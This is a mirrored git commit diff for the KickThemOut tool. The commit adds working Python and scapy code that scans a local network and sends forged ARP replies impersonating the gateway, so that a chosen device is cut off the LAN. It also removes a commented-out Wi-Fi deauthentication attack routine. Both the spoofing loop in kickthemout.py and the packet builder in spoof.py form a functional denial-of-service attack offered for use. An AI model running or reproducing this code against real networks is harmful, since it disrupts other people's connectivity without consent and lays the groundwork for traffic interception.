mirror of
https://github.com/k4m4/kickthemout.git
synced 2024-11-22 13:04:25 +01:00
Successful KickONEOff function
This commit is contained in:
parent
bb5fe3956b
commit
7da2359a29
149
kickthemout.py
149
kickthemout.py
@ -1,19 +1,23 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
# -.- coding: utf-8 -.-
|
# -.- coding: utf-8 -.-
|
||||||
# kickthemout.py
|
# kickthemout.py
|
||||||
|
# authors: k4m4 & xdavidhu
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (C) 2016 Nikolaos Kamarinakis (nikolaskam@gmail.com)
|
Copyright (C) 2016 Nikolaos Kamarinakis (nikolaskam@gmail.com) & David Schütz (xdavid@protonmail.com)
|
||||||
See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject)
|
See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject)
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import time, os, sys, logging
|
import time, os, sys, logging, math
|
||||||
|
import scan, spoof
|
||||||
from time import sleep
|
from time import sleep
|
||||||
|
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up scapy!
|
||||||
|
from scapy.all import *
|
||||||
|
|
||||||
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'
|
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'
|
||||||
|
|
||||||
def heading():
|
def heading():
|
||||||
print(GREEN + """
|
sys.stdout.write(GREEN + """
|
||||||
█ █▀ ▄█ ▄█▄ █ █▀ ▄▄▄▄▀ ▄ █ ▄███▄ █▀▄▀█ ████▄ ▄ ▄▄▄▄▀
|
█ █▀ ▄█ ▄█▄ █ █▀ ▄▄▄▄▀ ▄ █ ▄███▄ █▀▄▀█ ████▄ ▄ ▄▄▄▄▀
|
||||||
█▄█ ██ █▀ ▀▄ █▄█ ▀▀▀ █ █ █ █▀ ▀ █ █ █ █ █ █ ▀▀▀ █
|
█▄█ ██ █▀ ▀▄ █▄█ ▀▀▀ █ █ █ █▀ ▀ █ █ █ █ █ █ ▀▀▀ █
|
||||||
█▀▄ ██ █ ▀ █▀▄ █ ██▀▀█ ██▄▄ █ ▄ █ █ █ █ █ █
|
█▀▄ ██ █ ▀ █▀▄ █ ██▀▀█ ██▄▄ █ ▄ █ █ █ █ █ █
|
||||||
@ -22,7 +26,7 @@ def heading():
|
|||||||
▀ ▀ ▀ ▀ ▀▀▀
|
▀ ▀ ▀ ▀ ▀▀▀
|
||||||
""" + END + BLUE +
|
""" + END + BLUE +
|
||||||
'\n' + '{0}Kick Devices Off Your LAN ({1}KickThemOut{2}){3}'.format(YELLOW, RED, YELLOW, BLUE).center(88) +
|
'\n' + '{0}Kick Devices Off Your LAN ({1}KickThemOut{2}){3}'.format(YELLOW, RED, YELLOW, BLUE).center(88) +
|
||||||
'\n' + 'Made With <3 by: {0}Nikolaos Kamarinakis ({1}k4m4{2}){3}'.format(YELLOW, RED, YELLOW, BLUE).center(87) +
|
'\n' + 'Made With <3 by: {0}Nikolaos Kamarinakis ({1}k4m4{2}) & {0}David Schütz ({1}xdavidhu{2}){3}'.format(YELLOW, RED, YELLOW, BLUE).center(67) +
|
||||||
'\n' + 'Version: {0}0.1{1}'.format(YELLOW, END).center(77))
|
'\n' + 'Version: {0}0.1{1}'.format(YELLOW, END).center(77))
|
||||||
|
|
||||||
def optionBanner():
|
def optionBanner():
|
||||||
@ -35,8 +39,44 @@ def optionBanner():
|
|||||||
sleep(0.2)
|
sleep(0.2)
|
||||||
print('\n\t{0}[{1}E{2}]{3} Exit KickThemOut\n').format(YELLOW, RED, YELLOW, WHITE)
|
print('\n\t{0}[{1}E{2}]{3} Exit KickThemOut\n').format(YELLOW, RED, YELLOW, WHITE)
|
||||||
|
|
||||||
|
def scanNetwork():
|
||||||
|
global hostsList
|
||||||
|
hostsList = scan.scanNetwork()
|
||||||
|
|
||||||
def kickoneoff():
|
def kickoneoff():
|
||||||
print('kickoneoff')
|
os.system("clear||cls")
|
||||||
|
|
||||||
|
print("\n{0}kickONEOff{1} selected...{2}\n").format(RED, GREEN, END)
|
||||||
|
scanNetwork()
|
||||||
|
print "Online IPs: "
|
||||||
|
|
||||||
|
for i in range(len(onlineIPs)):
|
||||||
|
print(" ["+str(i)+"] {0}"+str(onlineIPs[i])+"{1}\n").format(RED, END)
|
||||||
|
|
||||||
|
choice = int(raw_input("IP of the target: ")) # TODO: try, except
|
||||||
|
one_target_ip = onlineIPs[choice]
|
||||||
|
one_target_mac = ""
|
||||||
|
for host in hostsList:
|
||||||
|
if host[0] == one_target_ip:
|
||||||
|
one_target_mac = host[1]
|
||||||
|
if one_target_mac == "":
|
||||||
|
print("\nIP address is not up. Please try again.")
|
||||||
|
return
|
||||||
|
|
||||||
|
print("\n{0}Target mac => '{1}" + one_target_mac + "{2}'{3}\n").format(GREEN, RED, GREEN, END)
|
||||||
|
print("{0}Spoofing started... {1}\n").format(GREEN, END)
|
||||||
|
try:
|
||||||
|
while True:
|
||||||
|
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, one_target_ip, one_target_mac)
|
||||||
|
time.sleep(15)
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
print("\n{0}Re-arping{1} target...{2}").format(RED, GREEN, END)
|
||||||
|
rearp = 1
|
||||||
|
while rearp != 10:
|
||||||
|
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, one_target_ip, one_target_mac)
|
||||||
|
rearp = rearp + 1
|
||||||
|
time.sleep(0.5)
|
||||||
|
print("\n{0}Done.{1}").format(GREEN, END)
|
||||||
|
|
||||||
def kicksomeoff():
|
def kicksomeoff():
|
||||||
print('kicksomeoff')
|
print('kicksomeoff')
|
||||||
@ -44,71 +84,56 @@ def kicksomeoff():
|
|||||||
def kickalloff():
|
def kickalloff():
|
||||||
print('kickalloff')
|
print('kickalloff')
|
||||||
|
|
||||||
"""
|
def getDefaultInterface():
|
||||||
def deauth_attack(iface, bssid):
|
def long2net(arg):
|
||||||
|
if (arg <= 0 or arg >= 0xFFFFFFFF):
|
||||||
|
raise ValueError("illegal netmask value", hex(arg))
|
||||||
|
return 32 - int(round(math.log(0xFFFFFFFF - arg, 2)))
|
||||||
|
|
||||||
client = 'FF:FF:FF:FF:FF:FF'
|
def to_CIDR_notation(bytes_network, bytes_netmask):
|
||||||
|
network = scapy.utils.ltoa(bytes_network)
|
||||||
|
netmask = long2net(bytes_netmask)
|
||||||
|
net = "%s/%s" % (network, netmask)
|
||||||
|
if netmask < 16:
|
||||||
|
return None
|
||||||
|
|
||||||
conf.iface = iface
|
return net
|
||||||
conf.verb = 0
|
|
||||||
packet = RadioTap()/Dot11(type=0,subtype=12,addr1=client,
|
|
||||||
addr2=bssid,addr3=bssid)/Dot11Deauth(reason=7)
|
|
||||||
|
|
||||||
print('\nChoose option from menu:\n')
|
for network, netmask, _, interface, address in scapy.config.conf.route.routes:
|
||||||
print('\t{0}[{1}1{2}]{3} Kick Once').format(YELLOW, RED, YELLOW, WHITE)
|
|
||||||
sleep(0.2)
|
|
||||||
print('\t{0}[{1}2{2}]{3} Keep Kicking').format(YELLOW, RED, YELLOW, WHITE)
|
|
||||||
sleep(0.2)
|
|
||||||
|
|
||||||
choice = None
|
# skip loopback network and default gw
|
||||||
while choice == None:
|
if network == 0 or interface == 'lo' or address == '127.0.0.1' or address == '0.0.0.0':
|
||||||
header = ('\n{0}kickthemout{1}> '.format(BLUE, WHITE))
|
continue
|
||||||
choice = raw_input(header)
|
|
||||||
if choice == '1':
|
if netmask <= 0 or netmask == 0xFFFFFFFF:
|
||||||
pcounter_header = ('{0}kickthemout{1}> numofpackets: '.format(BLUE, WHITE))
|
continue
|
||||||
pcounter = raw_input(pcounter_header)
|
|
||||||
print(pcounter) # {TESTING}
|
net = to_CIDR_notation(network, netmask)
|
||||||
packets_sent = 0
|
|
||||||
for i in range(int(pcounter)):
|
if interface != scapy.config.conf.iface:
|
||||||
sendp(packet)
|
continue
|
||||||
packets_sent += 1
|
|
||||||
print 'Deauth sent via: ' + iface + ' to BSSID: ' + bssid + '.\nPackets sent: ' + str(packets_sent)
|
if net:
|
||||||
sleep(2)
|
return interface
|
||||||
elif choice == '2':
|
|
||||||
time_header = ('{0}kickthemout{1}> keepkickingfor(mins): '.format(BLUE, WHITE))
|
def getGatewayIP():
|
||||||
attack_time = float(raw_input(time_header))
|
getGateway_p = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX", verbose=False)
|
||||||
start = time.time()
|
return getGateway_p.src
|
||||||
packets_sent = 0
|
|
||||||
while (time.time() - start) != attack_time:
|
|
||||||
sendp(packet)
|
|
||||||
packets_sent += 1
|
|
||||||
print 'Deauth sent via: ' + iface + ' to BSSID: ' + bssid + '.\nPackets sent: ' + str(packets_sent)
|
|
||||||
sleep(2)
|
|
||||||
else:
|
|
||||||
choice = None
|
|
||||||
print('*INVALID OPTION*') # {TESTING}
|
|
||||||
"""
|
|
||||||
|
|
||||||
def main():
|
def main():
|
||||||
|
|
||||||
heading()
|
heading()
|
||||||
|
|
||||||
|
print("\n{0}Using interface '{1}"+defaultInterface+"{2}' with mac address '{3}"+defaultInterfaceMac+"{4}'.\nGateway IP: '{5}"
|
||||||
|
+ defaultGatewayIP + "{6}'. {7}" + str(len(hostsList)) + "{8} hosts are up.{9}").format(GREEN, RED, GREEN, RED, GREEN, RED, GREEN, RED, GREEN, END)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
# CHECK FOR WIRELESS CARD
|
|
||||||
iface_header = ('\n{0}kickthemout{1}> interface: '.format(BLUE, WHITE))
|
|
||||||
iface = raw_input(iface_header)
|
|
||||||
|
|
||||||
# SCAN (AIRODUMP-NG) & PARSE (BSSIDs)
|
|
||||||
# ...
|
|
||||||
|
|
||||||
bssid_header = ('{0}kickthemout{1}> bssid: '.format(BLUE, WHITE))
|
|
||||||
bssid = raw_input(bssid_header) # {TESTING}
|
|
||||||
|
|
||||||
while True:
|
while True:
|
||||||
|
|
||||||
optionBanner()
|
optionBanner()
|
||||||
|
|
||||||
header = ('{0}kickthemout{1}> '.format(BLUE, WHITE))
|
header = ('{0}kickthemout{1}> {2}'.format(BLUE, WHITE, END))
|
||||||
choice = raw_input(header)
|
choice = raw_input(header)
|
||||||
|
|
||||||
if choice.upper() == 'E' or choice.upper() == 'EXIT':
|
if choice.upper() == 'E' or choice.upper() == 'EXIT':
|
||||||
@ -131,8 +156,18 @@ def main():
|
|||||||
|
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
print('\nThanks for dropping by.'
|
print('\nThanks for dropping by.'
|
||||||
'\nCatch ya later!')
|
'\nCatch ya later!{0}').format(END)
|
||||||
|
|
||||||
|
|
||||||
if __name__ == '__main__':
|
if __name__ == '__main__':
|
||||||
|
|
||||||
|
defaultInterface = getDefaultInterface()
|
||||||
|
defaultGatewayIP = getGatewayIP()
|
||||||
|
defaultInterfaceMac = get_if_hwaddr(defaultInterface)
|
||||||
|
scanNetwork()
|
||||||
|
onlineIPs = []
|
||||||
|
for host in hostsList:
|
||||||
|
onlineIPs.append(host[0])
|
||||||
|
if host[0] == defaultGatewayIP:
|
||||||
|
defaultGatewayMac = host[1]
|
||||||
|
|
||||||
main()
|
main()
|
||||||
|
64
scan.py
Normal file
64
scan.py
Normal file
@ -0,0 +1,64 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# -.- coding: utf-8 -.-
|
||||||
|
# scan.py
|
||||||
|
# author: Benedikt Waldvogel
|
||||||
|
# edited by: k4m4 & xdavidhu
|
||||||
|
|
||||||
|
import scapy.config, scapy.layers.l2, scapy.route, socket, math, errno
|
||||||
|
|
||||||
|
def scanNetwork():
|
||||||
|
|
||||||
|
def long2net(arg):
|
||||||
|
if (arg <= 0 or arg >= 0xFFFFFFFF):
|
||||||
|
raise ValueError("illegal netmask value", hex(arg))
|
||||||
|
return 32 - int(round(math.log(0xFFFFFFFF - arg, 2)))
|
||||||
|
|
||||||
|
|
||||||
|
def to_CIDR_notation(bytes_network, bytes_netmask):
|
||||||
|
network = scapy.utils.ltoa(bytes_network)
|
||||||
|
netmask = long2net(bytes_netmask)
|
||||||
|
net = "%s/%s" % (network, netmask)
|
||||||
|
if netmask < 16:
|
||||||
|
return None
|
||||||
|
|
||||||
|
return net
|
||||||
|
|
||||||
|
|
||||||
|
def scan_and_print_neighbors(net, interface, timeout=1):
|
||||||
|
hostsList = []
|
||||||
|
try:
|
||||||
|
ans, unans = scapy.layers.l2.arping(net, iface=interface, timeout=timeout, verbose=False)
|
||||||
|
for s, r in ans.res:
|
||||||
|
mac = r.sprintf("%Ether.src%")
|
||||||
|
ip = r.sprintf("%ARP.psrc%")
|
||||||
|
line = r.sprintf("%Ether.src% %ARP.psrc%")
|
||||||
|
hostsList.append([ip, mac])
|
||||||
|
try:
|
||||||
|
hostname = socket.gethostbyaddr(r.psrc)
|
||||||
|
line += "," + hostname[0]
|
||||||
|
except socket.herror:
|
||||||
|
pass
|
||||||
|
except socket.error as e:
|
||||||
|
if e.errno == errno.EPERM: # Operation not permitted
|
||||||
|
exit()
|
||||||
|
else:
|
||||||
|
raise
|
||||||
|
return hostsList
|
||||||
|
|
||||||
|
for network, netmask, _, interface, address in scapy.config.conf.route.routes:
|
||||||
|
|
||||||
|
# skip loopback network and default gw
|
||||||
|
if network == 0 or interface == 'lo' or address == '127.0.0.1' or address == '0.0.0.0':
|
||||||
|
continue
|
||||||
|
|
||||||
|
if netmask <= 0 or netmask == 0xFFFFFFFF:
|
||||||
|
continue
|
||||||
|
|
||||||
|
net = to_CIDR_notation(network, netmask)
|
||||||
|
|
||||||
|
if interface != scapy.config.conf.iface:
|
||||||
|
# see http://trac.secdev.org/scapy/ticket/537
|
||||||
|
continue
|
||||||
|
|
||||||
|
if net:
|
||||||
|
return scan_and_print_neighbors(net, interface)
|
59
spoof.py
59
spoof.py
@ -1,3 +1,13 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# -.- coding: utf-8 -.-
|
||||||
|
# spoof.py
|
||||||
|
# authors: k4m4 & xdavidhu
|
||||||
|
|
||||||
|
"""
|
||||||
|
Copyright (C) 2016 Nikolaos Kamarinakis (nikolaskam@gmail.com) & David Schütz (xdavid@protonmail.com)
|
||||||
|
See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject)
|
||||||
|
"""
|
||||||
|
|
||||||
import sys
|
import sys
|
||||||
from scapy.all import (
|
from scapy.all import (
|
||||||
get_if_hwaddr,
|
get_if_hwaddr,
|
||||||
@ -7,40 +17,27 @@ from scapy.all import (
|
|||||||
sendp
|
sendp
|
||||||
)
|
)
|
||||||
|
|
||||||
try:
|
def sendPacket(my_mac, gateway_ip, target_ip, target_mac):
|
||||||
my_mac = sys.argv[1]
|
|
||||||
interface = sys.argv[2]
|
|
||||||
my_ip = sys.argv[3]
|
|
||||||
target_ip = sys.argv[4]
|
|
||||||
target_mac = sys.argv[5]
|
|
||||||
except:
|
|
||||||
print "Usage: sudo python spoof.py [MY_MAC] [IFACE] [GATEWAY_IP] [TARGET_IP] [TARGET_MAC]"
|
|
||||||
exit()
|
|
||||||
|
|
||||||
ether = Ether()
|
ether = Ether()
|
||||||
ether.src = my_mac # Default: network card mac
|
ether.src = my_mac
|
||||||
|
|
||||||
arp = ARP()
|
arp = ARP()
|
||||||
arp.psrc = my_ip
|
arp.psrc = gateway_ip
|
||||||
arp.hwsrc = my_mac
|
arp.hwsrc = my_mac
|
||||||
|
|
||||||
arp = arp
|
arp = arp
|
||||||
arp.pdst = target_ip # Default: 0.0.0.0
|
arp.pdst = target_ip
|
||||||
arp.hwdst = target_mac # Default: 00:00:00:00:00:00
|
arp.hwdst = target_mac
|
||||||
|
|
||||||
ether = ether
|
ether = ether
|
||||||
ether.src = my_mac
|
ether.src = my_mac
|
||||||
ether.dst = target_mac # Default: ff:ff:ff:ff:ff:f
|
ether.dst = target_mac
|
||||||
|
|
||||||
def craftRequestPkt():
|
|
||||||
packet = ether/arp
|
|
||||||
sendp(x=packet, inter=1, count=1000)
|
|
||||||
|
|
||||||
def craftReplyPkt():
|
|
||||||
arp.op = 2
|
arp.op = 2
|
||||||
packet = ether/arp
|
|
||||||
sendp(x=packet, inter=1, count=1000)
|
def broadcastPacket():
|
||||||
|
packet = ether/arp
|
||||||
|
sendp(x=packet, verbose=False)
|
||||||
if __name__ == '__main__':
|
|
||||||
craftReplyPkt()
|
broadcastPacket()
|
||||||
|
Loading…
Reference in New Issue
Block a user